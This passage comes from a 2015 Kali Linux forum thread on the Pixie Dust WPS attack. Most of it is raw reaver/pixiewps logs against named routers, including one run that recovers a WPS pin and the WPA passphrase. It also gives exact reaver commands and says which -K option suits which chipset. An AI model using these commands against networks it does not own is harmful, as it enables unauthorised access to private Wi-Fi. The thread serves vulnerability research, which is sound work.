    [P] PKR: 1d:4d:69:d6:76:ac:8d:6f:9e:d7:7a:3a:4a:0b:d7:38:91:fe:e4:76:99:dc:de:95:70:0f:76:8e:cf:f0:ae:9d:61:21:2e:9e:a2:49:a6:38:ce:84:bf:8c:24:d1:6e:67:27:9c:8c:5f:14:0b:80:f2:52:aa:81:ed:f9:b7:c4:93:4e:fb:c7:6c:fd:16:5d:81:d8:5d:73:c2:72:1f:9d:54:3d:a0:33:cc:83:61:e1:22:9c:4a:8d:61:d1:19:87:78:7c:ea:0e:83:1f:33:bc:a4:07:e2:a0:0a:ad:69:6b:e8:13:ca:6f:0d:d6:c5:6c:0f:0d:03:b2:4b:7c:77:22:30:c6:60:70:2d:9a:c6:fb:dc:fc:ac:6a:83:60:a0:78:e2:65:c1:53:e7:d3:c6:0c:14:75:98:83:ec:c4:6b:ff:ad:c3:4f:bc:87:d4:27:d5:6c:6d:77:d0:c6:9f:10:1d:46:54:94:6a:9e:8a:47:f0:2a:f9:e3:49:e0:93:a3:cf:99
    [P] AuthKey: e0:9a:70:98:e9:02:e6:35:de:9f:51:76:8a:bb:79:5d:c2:7e:86:55:bf:bb:ad:d6:c1:59:f6:72:ea:e1:eb:66
    [+] Sending M2 message
    [P] E-Hash1: d5:ae:2b:a4:98:12:42:08:3a:0e:7a:a2:20:b0:38:c2:92:cc:d2:89:e1:e5:d2:06:26:78:94:bd:7d:d2:70:8a
    [P] E-Hash2: f5:92:52:dc:5a:67:0a:d6:c7:b4:86:b6:7b:72:19:c9:42:f7:6f:47:cc:38:5b:3c:b5:25:74:1a:43:99:75:0c
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 1 s
    [Pixie-Dust]
    TP-LINK TD-W8960N Not Vulneruable

    Code:
     XX:XX:XX:XX:XX:XX|11|-51|1.0|No |TP-LINK_48FD412| TP-LINK| 12345690
    
    OUI: 00-10-18 (Broadcom)
    
    Device Name: TD-W8960N
    
    
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 5a:07:59:bb:b9:6a:14:bf:3a:ed:0b:50:5b:2d:8d:d2
    [P] PKE: 7f:1f:e6:78:73:18:20:fc:f8:a4:1c:dd:b6:6f:2f:a4:fb:19:2e:45:45:9a:3c:21:4b:ca:b3:ef:74:25:af:c2:a5:77:f0:da:a6:bc:7b:30:9a:24:36:d6:8c:e6:70:dd:fc:3f:53:2d:ba:f5:35:97:5c:04:c8:96:a7:37:f5:c7:0a:3d:40:74:c5:18:c3:a3:6a:c0:bb:92:e2:98:85:79:46:51:e5:01:0f:fc:9f:3f:70:42:9f:6c:4f:3f:8f:58:bb:2f:b8:48:e5:41:64:82:ea:49:c5:80:8b:60:71:0c:31:e8:d6:30:5a:d7:e5:f8:60:02:e0:9b:c8:e0:19:5b:23:61:ff:8f:47:5d:e2:94:9f:20:a2:5e:3d:25:6d:4f:6f:93:9b:32:c9:b4:12:4b:a9:7f:80:69:f8:48:8c:eb:a3:5d:25:94:3f:19:67:91:e1:96:aa:1e:1b:49:37:46:45:39:6a:a2:17:db:7a:1c:6b:34:94:db:64:bd:f5:18
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 123456
    [P] WPS Model Serial Number: 1234
    [+] Received M1 message
    [P] PKR: 95:2b:f1:10:06:77:c0:86:a1:ed:4e:72:1b:86:ab:a0:0f:0f:cd:53:36:31:8f:6b:7e:24:15:19:15:6e:b5:35:c3:f8:8b:0c:11:52:59:79:70:0c:20:5d:36:ca:8a:49:a7:28:19:55:71:c3:69:a5:49:b9:f5:6c:8a:6b:91:6f:79:a3:35:77:59:86:2e:8b:92:f6:d6:e2:b1:c5:72:c9:bd:96:8e:55:5c:48:c5:9c:71:68:77:1f:2e:d0:79:f1:46:c3:f6:98:5c:32:a8:01:f2:f4:71:d3:52:82:67:0c:85:58:b5:eb:f5:5d:a0:61:47:b3:91:1b:b8:1c:2f:b8:90:b3:ec:cd:9c:28:f3:1f:26:d0:5a:7e:1d:65:ca:f0:d1:1d:e2:ce:a3:9a:02:65:8d:15:85:07:30:20:dc:d3:6c:04:de:a4:23:b3:ec:72:bc:13:a6:60:cd:d0:72:98:fd:53:35:ff:6e:d5:6c:60:45:ba:75:7a:3c:ff:a0:4e
    [P] AuthKey: 96:60:ce:20:f5:dd:07:56:0c:71:21:e7:bf:6a:34:5b:97:4c:2a:80:23:bf:48:5b:d5:28:cf:51:2d:32:a6:0b
    [+] Sending M2 message
    [P] E-Hash1: d6:b8:56:b3:22:cb:8e:b1:15:c6:3c:b8:a4:21:99:4c:ff:a2:fb:88:d7:47:21:73:3f:2b:0c:fd:92:be:92:5a
    [P] E-Hash2: 96:bc:4e:e2:e1:14:a5:ea:8e:a3:65:03:66:f0:ef:d6:6f:ea:c9:9c:ee:60:07:dc:be:e0:63:c2:67:1c:8d:ea
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 1 s
    [Pixie-Dust]

    Billion 7800N Vulnerable

    XX:XX:XX:XX:XX:XX| 1|-40|1.0|No |Corona| http://www.billion.com.au| 1.0

    OUI: 00-0c-43 (RalinkTe)

    RT2880iNIC

    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 4b:65:ca:9d:f1:f3:8c:76:3a:ab:b7:42:8a:92:2f:b5
    [P] PKE: fd:a7:c9:c0:d9:4c:7e:fd:24:ea:5a:ec:64:e2:f1:d5:aa :f6:75:e8:f8:7f:70:a3:e9:97:5f:6c:a3:92:60:42:34:d c:ae:63:d1:ef:99:61:26:46:23:aa:26:95:61:4a:df:91: 63:f9:77:fe:0e:a6:17:d2:2e:d1:39:27:d2:78:03:50:8f :06:7b:74:c6:08:af:11:0b:17:4e:75:db:52:b9:56:40:3 8:90:6a:d2:c0:69:af:d3:22:9e:45:b2:f3:fe:6f:b2:74: 2b:c3:93:b3:e6:9d:74:57:5f:f0:7a:0d:ad:34:0d:47:b7 :72:2b:5d:0d:b2:d1:7b:d3:6e:24:a8:dc:f8:e1:84:f8:a 8:65:bf:96:5a:7c:ee:4e:3e:09:80:c4:c1:07:92:1a:06: 83:bb:f2:64:e3:f9:06:39:b5:c3:23:9c:7a:4f:a3:56:3a :2c:56:83:1b:fe:c2:da:35:69:06:45:d4:5a:f1:6e:25:2 4:86:f2:db:3b:0a:0a:b7:21
    [P] WPS Manufacturer: http://www.billion.com.au
    [P] WPS Model Number: 1.0
    [P] WPS Model Serial Number: 12345678
    [+] Received M1 message
    [P] PKR: a7:b1:8c:7c:db:7e:28:fb:8a:27:9f:e9:ff:93:12:9d:ae :6b:89:ea:65:54:c2:2b:a2:0a:7b:d7:ee:57:ec:76:71:f 5:5f:32:a4:94:ce:53:82:0c:9e:95:e7:e7:69:18:da:0d: f0:f2:ec:ba:b3:bd:21:bc:d3:98:ac:86:e8:1a:b3:09:e7 :db:23:e3:ed:e2:d6:e7:ec:aa:da:53:45:60:78:98:78:7 d:0d:09:5b:58:32:1b:8a:3a:96:b9:52:b0:0c:e3:ec:ee: db:92:cf:bf:0f:87:d5:84:ce:3a:73:28:a4:90:99:f5:3c :67:c6:1e:9c:06:35:fa:07:ed:15:f5:a1:fe:29:b3:ab:e d:50:86:74:30:11:97:a6:17:e7:5e:f7:72:1f:4f:bf:30: 20:43:0f:bc:88:53:1a:fc:e0:db:96:3a:f6:66:1d:d1:31 :c7:4a:44:a1:f1:d5:05:a0:80:c7:22:bd:29:e0:ed:b8:d d:80:be:70:ea:ff:a4:3c:47
    [P] AuthKey: 4c:23:09:ed:5f:b8:15:15:1e:61:b6:99:46:53:d7:2b:9c :85:13:28:80:55:b7:b5:e5:6e:bd:cc:35:99:c5:85
    [+] Sending M2 message
    [P] E-Hash1: e6:87:2c:1f:b0:60:de:3f:65:8a:4b:02:30:36:1e:da:b3 :0e:58:ee:54:db:bc:d0:72:61:55:de:39:5f:a9:bb
    [P] E-Hash2: e8:c0:54:54:fa:f8:e1:ef:ad:ed:5b:90:81:60:af:6f:53 :c5:74:2d:ba:aa:6c:28:28:e6:a5:fa:8c:78:fe:ec
    [Pixie-Dust]
    [Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] PSK1: 91:5a:dd:fd:ef:ce:21:83:97:a9:13:ef:ed:94:5a:cf
    [Pixie-Dust][*] PSK2: 91:e6:ab:f1:08:66:bf:56:3e:df:3a:df:67:5a:de:90
    [Pixie-Dust] [+] WPS pin: 48606684
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    Running reaver with the correct pin, wait ...
    Cmd : reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 1 -s y -p 48606684

    [Reaver Test] BSSID: XX:XX:XX:XX:XX:XX
    [Reaver Test] Channel: 1
    [Reaver Test] [+] WPS PIN: '48606684'
    [Reaver Test] [+] WPA PSK: 'Routersecurityflawed'
    [Reaver Test] [+] AP SSID: 'Corona'


    Excellent work on the mods to reaver and the pixie wps

    Cheers
    Extra

  29. #229
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by unsuns06 View Post
    Hello Everyone !

    I want first to congratulate you about the great steps you did through this Pixie Dust Exploit.

    Also, I have noticed that today, on the WPS Pixie Dust Database , the router Technicolor TD5130 is being said as Vulnerable.

    However, I have tested Pixie (1.0.5) on both of my router versions (v1 & v2), but always unsuccessfully. I also tested this through PixieScript 2.4, but I still get "WPS Pin not found".

    So I want to know who could perform this exploit, and how (with full description if possible) ?

    There is also a TD5130 v3 that I'd love to test it on and share with you all.

    Thank You !
    The Realtek implementation is unfinished as of right now, 4/17/15. It ONLY works if the whole entire WPS exchange occurs within 1 second (here, E-S1 = E-S2 = E-Nonce). Wiire is currently working on the PRNG brute force and it shouldn't be too long that it is finished. In the meantime, I suggest you wait and don't try to attack it again so you don't get locked out. If you want, you can send me all the keys/info and I'll look into it more
    Last edited by soxrok2212; 2015-04-18 at 01:12.

  30. #230
    Join Date
    2013-Oct
    Posts
    321
    Very very very nice work guys, guess theres no stopping progress. :-)

    Would anyone mind if I added the pixie dust attack into FrankenScript?.

  31. #231
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    Quote Originally Posted by slim76 View Post
    ... guess theres no stopping progress...
    hey that's my line!!!

    Quote Originally Posted by slim76 View Post
    Would anyone mind if I added the pixie dust attack into FrankenScript?.
    I don't
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  32. #232
    Join Date
    2015-Apr
    Posts
    2
    Quote Originally Posted by t6_x View Post
    It would be interesting you put the output of reaver.

    So we can see what chipset is and other information

    I hope the following output of the tests of 3 routers is useful :

    root@kali64:~# reaver -i mon0 -b 5C9:98:33:xx:xx -vv -K 1

    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    mod by DataHead

    Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
    [+] Waiting for beacon from 5C9:98:33:xx:xx
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Associated with 5C9:98:33:xx:xx (ESSID: xxxxxxxxxxxx)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: fc:09:f4:f8:14:f7:d8:6a:e0:1f:45:af:39:c7:0f:ad
    [P] PKE: 85:84:7e:84:11:31:2e:77:e4:1b:da:ca:e5:be:c5:7f:1f :66:b5:e8:5f:21:f9:54:87:4f:49:ab:f4:bf:2d:93:e8:1 f:f3:92:de:d5:96:0f:98:25:e5:dd:74:d5:5a:ad:85:cc: 5a:f1:9d:c3:17:02:26:89:30:50:b4:e3:43:52:51:56:27 :7a:22:c2:a2:6d:ba:4c:c5:01:2d:ca:0c:21:ac:4c:94:1 2:27:aa:d1:3d:7c:49:bc:26:46:ac:c6:d6:e4:34:50:7c: 91:fd:25:fd:30:07:09:8d:88:5f:46:b8:ed:1e:99:70:42 :1b:29:31:7c:75:9c:56:4a:75:ee:3e:2d:0e:b1:45:e0:1 a:c7:e5:b4:e7:f8:88:bf:ae:87:2e:49:10:92:06:17:94: 49:c0:5d:4c:17:87:79:4c:c8:de:01:b0:0b:24:fb:2d:bd :4c:cb:80:99:7d:b4:d4:fa:af:38:8d:92:b2:77:ac:0d:6 9:9d:58:dc:a9:31:08:98:da
    [P] WPS Manufacturer: D-Link
    [P] WPS Model Number: DIR-615
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
    [P] AuthKey: 9a:86:3f:ff:71:8d:9d:e6:53:e3:a9:d7:e0:f8:95:cf:74 :0e:7e:88:32:67:c9:d1:87:2a:6b:e3:5a:17:88:4e
    [+] Sending M2 message
    [P] E-Hash1: 31:a7:13:e2:68:e4:4a:6f:af:c7:04:08:6e:5d:93:62:21 :b9:8e:a3:c3:31:47:d2:44:11:49:43:ef:ae:ac:c8
    [P] E-Hash2: 3c:60:ee:50:64:40:4a:16:52:73:3f:2c:34:9b:6c:7e:47 :71:9a:bc:71:b6:96:a1:3c:9b:c9:bc:14:ce:6d:76
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]


    root@kali64:~# reaver -i mon0 -b 40:16:7E:5D:xx:xx -vv -K 1

    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    mod by DataHead

    Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
    [+] Waiting for beacon from 40:16:7E:5D:xx:xx
    [+] Switching mon0 to channel 1
    [+] Associated with 40:16:7E:5D:xx:xx (ESSID: xxxxxxxxxxxx)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: c3:b1:c2:3b:2a:5f:f3:35:83:c4:d2:68:16:64:d9:76
    [P] PKE: ae:90:dd:03:c2:b4:b0:7f:17:5d:c9:cf:3a:d8:6b:ca:1f :24:08:20:55:a8:73:65:6f:61:b7:a3:a8:2c:00:58:fb:d 0:3d:bc:35:a6:f6:10:fc:d2:c1:70:1c:9d:5f:af:d6:ed: 3f:ab:38:ff:86:9d:f7:84:6f:22:3b:cf:1e:9f:bf:cc:a1 :74:07:a1:69:7c:71:75:4e:cf:10:d6:34:d8:3a:b4:07:5 8:50:95:70:73:53:0e:c3:0f:de:34:7d:51:05:ad:74:82: 08:c6:04:ef:f9:42:a8:29:19:0c:68:64:63:ee:77:d8:50 :b6:fb:9e:7d:87:84:86:fe:78:6e:54:15:b6:32:3c:60:9 2:1c:aa:ce:49:a7:13:09:2b:ee:a8:4c:31:d3:09:b6:11: c4:16:32:c5:b9:9e:0d:65:89:96:f1:7f:37:2f:42:75:d2 :cf:50:b6:67:70:a7:1a:28:a8:d1:e8:4a:ec:a9:26:9f:b 7:c8:ea:78:9f:ad:e3:06:a8
    [P] WPS Manufacturer: ASUSTeK Computer Inc.
    [P] WPS Model Number: RT-N12
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
    [P] AuthKey: 8d:9c:e2:47:23:ac:b2:d1:f6:de:cd:d5:c1:d3:3f:41:13 :a4:e7:5c:20:3b:24:7c:f2:1a:4b:19:6f:ca:68:3b
    [+] Sending M2 message
    [P] E-Hash1: 6b:0f:9b:cd:c8:0e:92:78:13:6f:b8:01:f1:45:0c:3d:99 :88:60:1d:5d:69:6e:e6:55:da:44:a1:d9:61:1f:52
    [P] E-Hash2: 0c:16:eb:80:24:18:f5:1a:7d:c3:11:ba:c4:1c:e6:d6:56 :81:31:c3:76:6a:52:1c:4a:c6:5e:ad:0c:51:19:7b
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]



    root@kali64:~# reaver -i mon0 -b 64:70:02:5C:xx:xx -vv -K 1

    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    mod by DataHead

    Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
    [?] Restore previous session for 64:70:02:5C:xx:xx? [n/Y] n

    [+] Associated with 64:70:02:5C:xx:xx (ESSID: xxxxxxxxxx)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: bf:1e:7d:b5:18:9e:f0:66:22:9c:5e:20:2e:43:31:6c
    [P] PKE: 9d:48:eb:a8:25:6e:6b:7d:aa:f5:b9:f2:da:49:66:b9:cd :8f:b1:ab:25:16:ba:7b:df:87:71:7e:d1:e8:af:b1:71:b a:c4:96:89:d8:db:1b:57:2c:61:cc:0e:a4:c6:31:02:38: 43:50:d1:be:b1:83:49:19:3e:8c:ed:9f:55:e5:6e:a7:1a :05:c5:5f:22:e0:c4:ac:d5:5d:d6:bd:32:a8:1d:e2:6f:2 5:78:e6:9a:4d:55:f1:7b:dd:ba:ed:13:7f:33:a6:76:38: af:c2:b5:d6:10:42:eb:98:4e:f6:fe:90:dd:4d:79:d6:08 :d7:3a:0c:86:11:4d:b5:75:76:d7:4c:48:a3:00:33:97:2 c:b5:57:a3:83:1a:5c:58:94:78:53:cf:58:54:c2:1f:fa: ec:91:06:84:d9:95:2a:38:31:72:a2:cc:17:63:a0:13:a0 :9e:7d:cf:cd:14:dd:07:82:76:2c:76:7d:2d:e2:fd:4a:d 9:a2:f4:b0:b1:fc:80:18:b1
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 1.0
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
    [P] AuthKey: 08:a0:73:06:7c:1c:bf:77:d9:04:a5:14:90:8f:b6:5d:4b :d7:f5:06:7a:8d:f4:e0:25:88:ae:70:07:d8:f4:82
    [+] Sending M2 message
    [P] E-Hash1: 2d:55:4e:4a:17:6a:87:ac:33:ae:e4:be:f8:3c:94:f0:d9 :ee:fd:5c:a6:a8:af:96:20:8a:07:e7:5d:cd:cd:35
    [P] E-Hash2: 11:f1:24:8c:37:54:fd:3c:5b:f3:b5:66:df:6a:58:e9:9c :f4:2c:9d:d5:ab:4e:36:89:bc:d8:27:9c:ac:15:7d
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]

  33. #233
    Join Date
    2015-Apr
    Posts
    9
    we want please if possible give as method to add more router and thanks @soxrok2212

  34. #234
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Just so you know, -K 1,2,3... Each number is for a different chipset. You have to look up which chipset the router uses and then us the corresponding -K 1,2,3 argument.

  35. #235
    Join Date
    2015-Apr
    Posts
    9
    soxrok2212 ..thanks for your works ..but in routeur TD5130 and TG589 V3 d ont works ..and we want a methode you are using for put routeurs in pxiewps

  36. #236
    Join Date
    2013-Oct
    Posts
    321
    @ Quest

    I heard your call matey, Guess I'll be adding it to FrankenScript. :-)
    Last edited by slim76; 2015-04-18 at 12:28.

  37. #237
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by soxrok2212 View Post
    Just so you know, -K 1,2,3... Each number is for a different chipset. You have to look up which chipset the router uses and then us the corresponding -K 1,2,3 argument.
    Hello matey,

    Any idea what -K option should be used with what chipsets?.

  38. #238
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by slim76 View Post
    Hello matey,

    Any idea what -K option should be used with what chipsets?.
    Yeah, I just send a message to t6_x, I think we will be removing those options to make it much simpler. I don't really understand it right now either but I guess I can try...

    Code:
    The -K option 1 run pixiewps without PKR and the e-s1 = e-s2 = 0
    The -K option 2 runs pixiewps without PKR and the e-s1 = e-s2 = 0 but using the -n option of pixiewps (E-Nonce)
    The -K option 3 runs pixiewps with PKE, PKR and the hash1 = hash2 = e-once
    1 should be used with Ralink and -S used in reaver
    2 should be used with Broadcom and -S used in reaver
    3 is for Realtek and -S is NOT used in reaver (realtek isn't finished yet... it has worked for me but other users report failures)

  39. #239
    Join Date
    2015-Mar
    Posts
    127
    Yea. agreed. I suggested to t6_x this idea on his thread.

    Just have reaver/pixie try all three attacks. User just wants the pin/passphrase quickly. Doesnt really care how. If user really wants to know which attack the AP was vulnerable to let him use --vvv.

  40. #240
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    @ Slim, great but don't move too quick, this is still in dev with improvements on the horizon, and the next Kali might be using different programs(?) like another Aircrack-ng https://bugs.kali.org/view.php?id=2219 for example. That might change a thing or two or maybe not.

    Anyways good to see you back and a new Franken looming [thumb up emoticon here]
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  41. #241
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by soxrok2212 View Post
    Yeah, I just send a message to t6_x, I think we will be removing those options to make it much simpler. I don't really understand it right now either but I guess I can try...

    Code:
    The -K option 1 run pixiewps without PKR and the e-s1 = e-s2 = 0
    The -K option 2 runs pixiewps without PKR and the e-s1 = e-s2 = 0 but using the -n option of pixiewps (E-Nonce)
    The -K option 3 runs pixiewps with PKE, PKR and the hash1 = hash2 = e-once
    1 should be used with Ralink and -S used in reaver
    2 should be used with Broadcom and -S used in reaver
    3 is for Realtek and -S is NOT used in reaver (realtek isn't finished yet... it has worked for me but other users report failures)
    Cheers for the info matey, its made things much clearer for me. :-)
    Cheers again for all your hard work, its greatly appreciated.

  42. #242
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by Quest View Post
    @ Slim, great but don't move too quick, this is still in dev with improvements on the horizon, and the next Kali might be using different programs(?) like another Aircrack-ng https://bugs.kali.org/view.php?id=2219 for example. That might change a thing or two or maybe not.

    Anyways good to see you back and a new Franken looming [thumb up emoticon here]
    Yeah, to be honest, I'd wait another week or two at least. Doing A LOT of work and there are still a lot of bugs to be ironed out. Anyways, I was thinking about starting a giant group-dev chat on Skype...? It would make communication a lot faster and info could be shared much much quicker. If you want to add me, my Skype is robert.jor49. I'm already in contact with a few of you guys, but theres still a few of you who are not there.

  43. #243
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by Quest View Post
    @ Slim, great but don't move too quick, this is still in dev with improvements on the horizon, and the next Kali might be using different programs(?) like another Aircrack-ng https://bugs.kali.org/view.php?id=2219 for example. That might change a thing or two or maybe not.

    Anyways good to see you back and a new Franken looming [thumb up emoticon here]
    I thought things would change a little, it shouldn't be much of an issue, worse case I'll have to rewrite the pixie attack in FrankenScript.
    I'm hoping to upload a tempory version of FrankenScript within the next few days if all goes well.

    Is it worth getting FrankenScript to print out the results of the pixie dust attacks with the Pin & Passphrase?, or should it just print the Pin & Passphrase?.

  44. #244
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by slim76 View Post
    Is it worth getting FrankenScript to print out the results of the pixie dust attacks with the Pin & Passphrase?, or should it just print the Pin & Passphrase?.
    Uhhhhh... what? Do you mean pixiewps's pin and then reaver's output? -- If so, just have it print the pin and passphrase from reaver.

  45. #245
    Join Date
    2013-Oct
    Posts
    321
    I just noticed something about the install of pixwps, the install directory is different for different install methods.

    apt-get installs pixiewps to: usr/bin
    make & make install installs pixiewps to: /usr/local/bin

    Does anyone know if reaver-wps-fork-t6x & reaver from the kali repo will detect pixiewps in either/both locations?

  46. #246
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by soxrok2212 View Post
    Uhhhhh... what? Do you mean pixiewps's pin and then reaver's output? -- If so, just have it print the pin and passphrase from reaver.
    Sorry I mean't details like the PKR, PKE, EHash, chipset and such.

  47. #247
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by slim76 View Post
    Sorry I mean't details like the PKR, PKE, EHash, chipset and such.
    Oh. Chipset/Model number/Manufacturer yes, the rest, no... just in case they want to report their findings

  48. #248
    Join Date
    2015-Apr
    Posts
    1
    Hello
    This site is in German. I hope this site helps with DLINK and Speedport.
    https://www.wardriving-forum.de/wiki...ardpasswörter

  49. #249
    Join Date
    2015-Apr
    Posts
    15
    Some new Signatures (tested with all 4 possible pixiewps option-combinations)

    NOT VULNERABLE:

    Code:
    ASUS RT-N66U
    Broadcom BCM4706
    
    [P] E-Nonce: 01:5a:54:01:c1:db:32:e5:2b:33:fd:bb:8c:9d:f0:9e
    [P] PKE: 8c:09:51:62:1f:45:31:98:32:a0:fc:58:0e:d5:ed:36:86:c4:b5:ab:7c:8c:c7:30:67:40:a9:ff:e7:62:8f:9b:7d:1c:31:d4:95:96:ce:ea:5b:b3:43:ba:d2:f7:12:8d:8e:48:01:fd:8c:0c:12:17:53:e7:aa:29:9b:9a:06:31:4f:73:e5:78:cc:b8:7e:99:26:1d:be:db:cb:69:45:f3:19:21:df:ab:cd:91:b5:d7:94:7d:83:b9:9e:b8:b5:55:61:ac:c2:78:17:f5:92:01:d4:a6:ed:fe:82:2f:83:23:87:05:5d:69:18:97:9e:c6:6f:34:cb:02:e2:a0:51:d1:18:24:c3:cc:7c:d7:ab:80:93:95:b6:48:ea:92:53:5a:96:6a:f9:4d:3e:a5:07:6d:4f:6a:20:cd:bf:5b:e0:b5:dc:b2:f1:55:17:43:7b:2c:26:0a:d2:05:ba:3a:87:da:dd:63:5c:5d:27:f7:84:4d:47:4a:b2:59:6a:3e:43:9b
